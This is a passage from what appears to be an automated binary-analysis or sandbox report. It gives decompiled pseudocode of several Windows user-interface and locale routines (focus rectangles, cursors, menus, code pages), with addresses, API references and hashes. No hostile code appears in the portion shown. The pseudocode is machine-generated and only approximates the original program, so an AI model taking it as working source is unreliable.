						_t196 =  *_t212;
						__eflags =  *((char*)(_t196 + 0x2e0)) - 4;
						if( *((char*)(_t196 + 0x2e0)) >= 4) {
							_v28.left = _v28.left - _v52;
							_t200 =  *_t212;
							__eflags =  *(_t200 + 0x2e9) & 0x00000001;
							if(( *(_t200 + 0x2e9) & 0x00000001) != 0) {
								_t76 =  &_v28;
								 *_t76 = _v28.left + _t127;
								__eflags =  *_t76;
							}
						}
						_t129 =  *( *_t212 + 0x2e0);
						__eflags = _t129;
						if(_t129 != 0) {
							__eflags = _t129 - 4;
							if(_t129 != 4) {
								_t80 =  &_v28;
								 *_t80 = _v28.left +  *( *_t212 + 0x234);
								__eflags =  *_t80;
							}
						}
						__eflags = _t129 - 3;
						if(_t129 == 3) {
							_t83 =  &_v28;
							 *_t83 = _v28.left +  *( *_t212 + 0x234);
							__eflags =  *_t83;
						}
						_t131 = E0043F370( *_t212);
						_t125 = GetFocus();
						__eflags = _t131 - _t125;
						if(_t131 != _t125) {
							goto L35;
						} else {
							_t125 =  *_t212;
							__eflags =  *(_t125 + 0x2e9) & 0x00000002;
							if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
								goto L35;
							}
							return DrawFocusRect(E00420244( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
						}
					} else {
						switch( *((intOrPtr*)(_t123 * 4 +  &M00466EB4))) {
							case 0:
								E004668AC(_t213);
								goto L22;
							case 1:
								__eax = E00466AB8(__edi, __esi, __ebp);
								goto L22;
							case 2:
								__eax = E00466A08(__edi, __ebp);
								goto L22;
							case 3:
								__eax = E004668FC(__edi, __esi, __ebp);
								goto L22;
							case 4:
								__eax = E00466B68(__edi, __esi, __eflags, __ebp);
								goto L22;
							case 5:
								__eax = E00466BF0(__edi, __eflags, __ebp);
								goto L22;
						}
					}
				} else {
					_t144 =  *_t212;
					__eflags =  *((short*)(_t144 + 0x2f2));
					if( *((short*)(_t144 + 0x2f2)) == 0) {
						goto L10;
					}
					_t145 =  *_t212;
					__eflags =  *((intOrPtr*)(_t145 + 0x22c)) - _v32;
					if( *((intOrPtr*)(_t145 + 0x22c)) != _v32) {
						_t148 =  *0x466fc4; // 0x0
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t148,  &_v28);
					}
					_t152 = E0043F370( *_t212);
					_t153 = GetFocus();
					__eflags = _t152 - _t153;
					if(_t152 != _t153) {
						_t155 =  *0x466fc0; // 0x1
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t155,  &_v28);
					}
					_t159 =  *0x466fbc; // 0x11
					 *((intOrPtr*)( *_t212 + 0x2f0))(_t159,  &_v28);
					_t125 =  *_t212;
					__eflags =  *(_t125 + 0x2e9) & 0x00000002;
					if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
						L35:
						return _t125;
					}
					return DrawFocusRect(E00420244( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
				}
			}

0x00466cd4
0x00466ce3
0x00466ce4
0x00466ce5
0x00466ce6
0x00466ce7
0x00466cea
0x00466ced
0x00466cf8
0x00466cfd
0x00466d01
0x00466d13
0x00000000
0x00466d1d
0x00466d27
0x00466d29
0x00466d30
0x00466df4
0x00466df4
0x00466e01
0x00466e0c
0x00466e0c
0x00466e12
0x00466e14
0x00466e16
0x00466e16
0x00466e19
0x00466e1e
0x00466e2b
0x00466e38
0x00466e42
0x00466e55
0x00466e60
0x00466e63
0x00466e6d
0x00466e7a
0x00466e7a
0x00466e85
0x00466e90
0x00466e9b
0x00466ea1
0x00466ea8
0x00466eab
0x00466f00
0x00466f02
0x00466f08
0x00466f0b
0x00000000
0x00000000
0x00466f11
0x00466f14
0x00466f18
0x00000000
0x00000000
0x00466f20
0x00466f32
0x00466f35
0x00466f37
0x00466f3e
0x00466f43
0x00466f46
0x00466f48
0x00466f4f
0x00466f51
0x00466f51
0x00466f51
0x00466f51
0x00466f4f
0x00466f56
0x00466f5c
0x00466f5e
0x00466f60
0x00466f62
0x00466f6c
0x00466f6c
0x00466f6c
0x00466f6c
0x00466f62
0x00466f6f
0x00466f71
0x00466f7b
0x00466f7b
0x00466f7b
0x00466f7b
0x00466f80
0x00466f87
0x00466f8c
0x00466f8e
0x00000000
0x00466f90
0x00466f90
0x00466f92
0x00466f99
0x00000000
0x00000000
0x00000000
0x00466fad
0x00466ead
0x00466ead
0x00000000
0x00466ecd
0x00000000
0x00000000
0x00466ed6
0x00000000
0x00000000
0x00466ee8
0x00000000
0x00000000
0x00466edf
0x00000000
0x00000000
0x00466ef1
0x00000000
0x00000000
0x00466efa
0x00000000
0x00000000
0x00466ead
0x00466d36
0x00466d36
0x00466d38
0x00466d40
0x00000000
0x00000000
0x00466d46
0x00466d4e
0x00466d51
0x00466dd5
0x00000000
0x00466de9
0x00466d55
0x00466d5c
0x00466d61
0x00466d63
0x00466db2
0x00000000
0x00466dc6
0x00466d69
0x00466d7d
0x00466d83
0x00466d85
0x00466d8c
0x00466fb8
0x00466fb8
0x00466fb8
0x00000000
0x00466da4

APIs

GetFocus.USER32 ref: 00466D5C
DrawFocusRect.USER32 ref: 00466DA4

Part of subcall function 0041FE50: FillRect.USER32 ref: 0041FE78

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FocusRect$DrawFill
String ID:
API String ID: 3476037706-0
Opcode ID: bd1b9c483f4283a30740da1dfeb4def7d3740dc75fefb3ab23e5821064b6e37e
Instruction ID: 3fa9c75077b7279c8ffb56afa9de9589e0afa2286d35e8dbe86cf40c3b74eb84
Opcode Fuzzy Hash: bd1b9c483f4283a30740da1dfeb4def7d3740dc75fefb3ab23e5821064b6e37e
Instruction Fuzzy Hash: 33914E34A00105CFCB14EF58D485EAEB7F5BF18304F2544BAE9849B326D739AC86CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00436BCC, Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00436BCC(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x48fba0 != 0) {
					L3:
					_t49 =  *0x48fb80; // 0x0
					_t50 =  *0x48fb80; // 0x0
					_t117 = E00436AAC(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x48fba0 == 0) {
						_t168 =  *0x48fba4;
						if( *0x48fba4 != 0) {
							_t106 =  *0x48fb94; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x48fba4; // 0x0
							E00440D20(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x48fb80; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x48fba0;
						_t6 =  &_v24;
						 *_t6 =  *0x48fba0 != 0;
						__eflags =  *_t6;
						 *0x48fba0 = 2;
					} else {
						 *0x48fba0 = 1;
						_v24 = 0;
					}
					_t54 =  *0x48fb84; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x48fb84; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						_t14 = _t155 + 4; // 0x0
						 *((intOrPtr*)(_t55 + 0x10)) =  *_t14;
						_t56 =  *0x48fb84; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x48fb84; // 0x0
							E00438800( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x48fb84; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t23 = _t155 + 4; // 0x0
						_t131 = E00436AFC(2);
						_t121 =  *_t155;
						_t60 =  *0x48fb84; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *_t23);
						if( *0x48fba4 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x48fba4; // 0x0
								E00440CDC(_t82, _t158);
								_t84 =  *0x48fba4; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t30 = _t155 + 4; // 0x0
									_t121 =  *_t30;
									_t85 =  *0x48fba4; // 0x0
									E00440E08(_t85,  *_t30,  *_t155, __eflags);
								} else {
									_t29 = _t155 + 4; // 0x0
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x48fba4; // 0x0
									E00440D20(_t89, _t88, _t177,  *_t29);
								}
							} else {
								_t91 =  *0x48fba4; // 0x0
								E00440E7C(_t91, _t131, __eflags);
								_t93 =  *0x48e838; // 0x48fc00
								SetCursor(E00456D18( *_t93, _t158));
							}
						}
						_t62 =  *0x48e838; // 0x48fc00
						_t65 = SetCursor(E00456D18( *_t62, _t158));
						if( *0x48fba0 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00436B38(_t121);
								_t67 =  *0x48fb84; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E00438800(_t118,  &_v24, _t155);
									_t65 = E004037B0(_t118, __eflags);
									_t135 =  *0x48fb84; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x48fb84; // 0x0
									_t65 = E004037B0( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x48fb84; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_t31 = _t155 + 4; // 0x0
								_push( *_t31);
								_t80 =  *0x48fb84; // 0x0
								_t65 = E004037B0( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x48fb84 == 0) {
								goto L32;
							} else {
								_t119 =  *0x48fb84; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00408460(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x48fb84; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x48fb84; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x48fb84; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E00436AFC(1);
					if( *0x48fb84 == 0) {
						goto L32;
					}
					_t102 =  *0x48fb84; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x48fb84; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x48fb84; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					_t11 = _t155 + 4; // 0x0
					 *((intOrPtr*)(_t104 + 0x10)) =  *_t11;
					_t65 = E00436AFC(0);
					if( *0x48fb84 == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x48fb90; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x48fb9c; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x48fb94; // 0x0
				_t1 = _t155 + 4; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *_t1 ^ __edx) - __edx;
				_t166 = _t65 -  *0x48fb9c; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

0x00436bd2
0x00436bdb
0x00436c0a
0x00436c0a
0x00436c10
0x00436c26
0x00436c2f
0x00436c31
0x00436c38
0x00436c3a
0x00436c40
0x00436c4d
0x00436c52
0x00436c52
0x00436c38
0x00436c57
0x00436c63
0x00436c73
0x00436c7a
0x00436c7a
0x00436c7a
0x00436c7f
0x00436c65
0x00436c65
0x00436c6c
0x00436c6c
0x00436c86
0x00436c8e
0x00436cdb
0x00436cdb
0x00436ce2
0x00436ce5
0x00436ce8
0x00436ceb
0x00436cf4
0x00436cfc
0x00436d04
0x00436d09
0x00436d12
0x00436d19
0x00436d19
0x00436d1c
0x00436d27
0x00436d29
0x00436d2b
0x00436d35
0x00436d3e
0x00436d42
0x00436d4c
0x00436d51
0x00436d56
0x00436d5b
0x00436d5f
0x00436d7a
0x00436d7a
0x00436d7f
0x00436d84
0x00436d61
0x00436d61
0x00436d65
0x00436d6c
0x00436d6e
0x00436d73
0x00436d73
0x00436d8b
0x00436d8b
0x00436d90
0x00436d98
0x00436da5
0x00436da5
0x00436d42
0x00436dad
0x00436dba
0x00436dc6
0x00436e99
0x00436e99
0x00436dcc
0x00436dcc
0x00436dce
0x00436def
0x00436df1
0x00436df6
0x00436df9
0x00436dfb
0x00436e29
0x00436e38
0x00436e3d
0x00436e43
0x00436dfd
0x00436e05
0x00436e11
0x00436e16
0x00436e1c
0x00436e1c
0x00436dd0
0x00436dd0
0x00436dd3
0x00436dd6
0x00436de3
0x00436de3
0x00436e4d
0x00000000
0x00436e4f
0x00436e4f
0x00436e55
0x00436e58
0x00436e60
0x00436e67
0x00000000
0x00000000
0x00436e6e
0x00436e70
0x00436e77
0x00436e77
0x00436e7a
0x00436e81
0x00436e84
0x00436e8f
0x00436e90
0x00436e91
0x00436e92
0x00000000
0x00436e92
0x00436e4d
0x00436dc6
0x00436c92
0x00436c9e
0x00000000
0x00000000
0x00436ca4
0x00436ca9
0x00436cac
0x00436cb4
0x00436cb7
0x00436cbe
0x00436cc1
0x00436cc4
0x00436cc9
0x00436cd5
0x00000000
0x00000000
0x00000000
0x00436cd5
0x00436bdd
0x00436be4
0x00436be9
0x00436bef
0x00000000
0x00000000
0x00436bf1
0x00436bf6
0x00436bf9
0x00436bfc
0x00436bfe
0x00436c04
0x00000000
0x00000000
0x00000000

APIs

GetDesktopWindow.USER32 ref: 00436C40
GetDesktopWindow.USER32 ref: 00436D65
SetCursor.USER32(00000000), ref: 00436DBA

Part of subcall function 00440E7C: 73D61770.COMCTL32(00000000,?,00436D95), ref: 00440E98
Part of subcall function 00440E7C: ShowCursor.USER32(000000FF,00000000,?,00436D95), ref: 00440EB3

SetCursor.USER32(00000000), ref: 00436DA5

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$DesktopWindow$D61770Show
String ID:
API String ID: 1612473249-0
Opcode ID: 107cde6ce86ada54e90c63d77bcd6d59792109bb451dcae293a6d7a000fa4dc9
Instruction ID: e57e7b251c3f88b75509248d867a3284fc81820a4deebc4aab082f42d04da392
Opcode Fuzzy Hash: 107cde6ce86ada54e90c63d77bcd6d59792109bb451dcae293a6d7a000fa4dc9
Instruction Fuzzy Hash: D0915878201202DFC300DF69D9A5A0A7BE1AB88364F55D97EE8448B362D778FC59CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0045311C, Relevance: 6.1, APIs: 4, Instructions: 148
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0045311C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x4532e2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E0044C3E0(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E0041BDFC(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E0043F674(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E0043F370(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E0043F674(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E0043F370(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E0043F674(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E0043F370(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E0043F370(_t92), _t70);
								}
								E0044C3E0(_t113, E0043F370(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E004541DC(_t92, 1);
							}
							E00453054(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x4532e9);
							return E00404320( &_v20);
						}
					}
				}
				_t77 =  *0x48fc00; // 0x2130f1c
				_t79 = E004568A0(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x48fc00; // 0x2130f1c
						if(_t113 ==  *((intOrPtr*)(E0045688C(_t81, _t111) + 0x248))) {
							_t83 =  *0x48fc00; // 0x2130f1c
							if(_t92 != E0045688C(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x48e554; // 0x41d314
								E00406520(_t87,  &_v20);
								E0040A124(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00403D80();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}

0x0045311c
0x00453124
0x00453127
0x0045312a
0x0045312c
0x00453130
0x00453131
0x00453136
0x00453139
0x0045313e
0x004531b0
0x004531b0
0x004531b8
0x004531bc
0x004531bc
0x004531c5
0x004531d1
0x004531d1
0x004531d3
0x004531db
0x004531e1
0x004531e1
0x004531e8
0x0045329b
0x004532a0
0x004532a2
0x004532ae
0x004532ae
0x00000000
0x00453201
0x0045320b
0x0045321a
0x00453274
0x0045327b
0x0045327f
0x00453284
0x00453286
0x00453292
0x00453292
0x00453286
0x00000000
0x0045327b
0x00000000
0x0045321c
0x0045321c
0x00453225
0x00453233
0x00453236
0x00453240
0x00453245
0x00453247
0x00453251
0x0045325d
0x0045325d
0x0045326d
0x0045326d
0x004532b3
0x004532ba
0x004532c0
0x004532c0
0x004532c7
0x004532ce
0x004532d1
0x004532d4
0x004532e1
0x004532e1
0x0045320b
0x004531e8
0x00453140
0x0045314a
0x0045314d
0x00453150
0x00453153
0x00453155
0x00453157
0x00453167
0x0045316b
0x00453177
0x0045317c
0x0045317f
0x0045318c
0x00453191
0x004531a0
0x004531a5
0x004531a5
0x00453177
0x004531aa
0x004531ab
0x004531ab
0x004531ab
0x00453155

APIs

GetMenu.USER32(00000000), ref: 00453240
SetMenu.USER32(00000000,00000000), ref: 0045325D
SetMenu.USER32(00000000,00000000), ref: 00453292
SetMenu.USER32(00000000,00000000,00000000,004532E2), ref: 004532AE

Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$LoadString
String ID:
API String ID: 3688185913-0
Opcode ID: 9897cc063449ae346f8935cf2211b3271d24f5cbc7803ed3d81050d3e1ac4619
Instruction ID: ef5aa86cf18416494199696bb31c19ba7e536e215e108b4ec80f9efbf203ed25
Opcode Fuzzy Hash: 9897cc063449ae346f8935cf2211b3271d24f5cbc7803ed3d81050d3e1ac4619
Instruction Fuzzy Hash: 5C51D130A04A005BDB10AF7AC88575A7794AF0538AF0845BBFC059B3A7CA7CDE4D879C

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADDC, Relevance: 6.1, APIs: 4, Instructions: 95
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADDC() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x48f7f0 = 0x409;
				 *0x48f7f4 = 9;
				 *0x48f7f8 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x48f7f0 = _t14;
				}
				if(_t14 != 0) {
					 *0x48f7f4 = _t14 & 0x3ff;
					 *0x48f7f8 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x4710c0, 0x40af30, 8 << 2);
				if( *0x4710ac != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x48f7fd = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x48f7fc = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040AD64(__eflags, _t49);
					}
				} else {
					_t20 = E0040ADC4();
					if(_t20 != 0) {
						 *0x48f7fd = 0;
						 *0x48f7fc = 0;
						return _t20;
					}
					E0040AD64(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E004030F8(0x4710c0, 0x20, 0x40af30);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x48f7fc = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x48f7fd = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x48f7f0; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x48f7fd = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}

0x0040ade8
0x0040adf2
0x0040adfc
0x0040ae06
0x0040ae0d
0x0040ae0f
0x0040ae0f
0x0040ae17
0x0040ae23
0x0040ae2f
0x0040ae2f
0x0040ae43
0x0040ae4c
0x0040aefb
0x0040af00
0x0040af05
0x0040af0c
0x0040af11
0x0040af13
0x0040af16
0x0040af1c
0x0040af1e
0x00000000
0x0040af26
0x0040ae52
0x0040ae52
0x0040ae59
0x0040ae5b
0x0040ae62
0x00000000
0x0040ae62
0x0040ae6f
0x0040ae7f
0x0040ae81
0x0040ae86
0x0040ae89
0x0040ae8f
0x0040ae91
0x0040ae93
0x00000000
0x0040ae93
0x0040ae9f
0x0040aea4
0x0040aeaa
0x0040aeaa
0x0040aeac
0x0040aead
0x0040aeae
0x0040aeae
0x0040aeca
0x0040aed0
0x0040aed5
0x0040aeda
0x0040aee0
0x0040aee0
0x0040aee4
0x0040aee7
0x0040aeed
0x0040aeef
0x00000000
0x00000000
0x0040aef1
0x0040aef4
0x0040aef4
0x0040aef5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040aef5
0x0040aee0
0x0040af2d
0x0040af2d
0x00000000

APIs

GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AED0
GetThreadLocale.KERNEL32 ref: 0040AE06

Part of subcall function 0040AD64: GetCPInfo.KERNEL32(00000000,?), ref: 0040AD7D

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: 16fbb727b208b623c8bdcd3b9acaca1d40a6624352cfca4efcb5ab8f3ec5d5ab
Instruction ID: 113102de598c33981c5aa76e4e277ee6f130da3c2bc8c5497194bd1892756a66
Opcode Fuzzy Hash: 16fbb727b208b623c8bdcd3b9acaca1d40a6624352cfca4efcb5ab8f3ec5d5ab
Instruction Fuzzy Hash: FA31E4715403938AE3109B25A801BAA3795EB51349F28847FE884EB3D6D63C4869C7AE

Uniqueness

Uniqueness Score: -1.00%

Function 0042358C, Relevance: 6.1, APIs: 4, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0042358C(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E0041FF00(_v8);
					_push(_t84);
					_push(0x42366b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E004248A8( *((intOrPtr*)(_v8 + 0x58)));
					E00423408( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E00424A88( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L00406A60();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
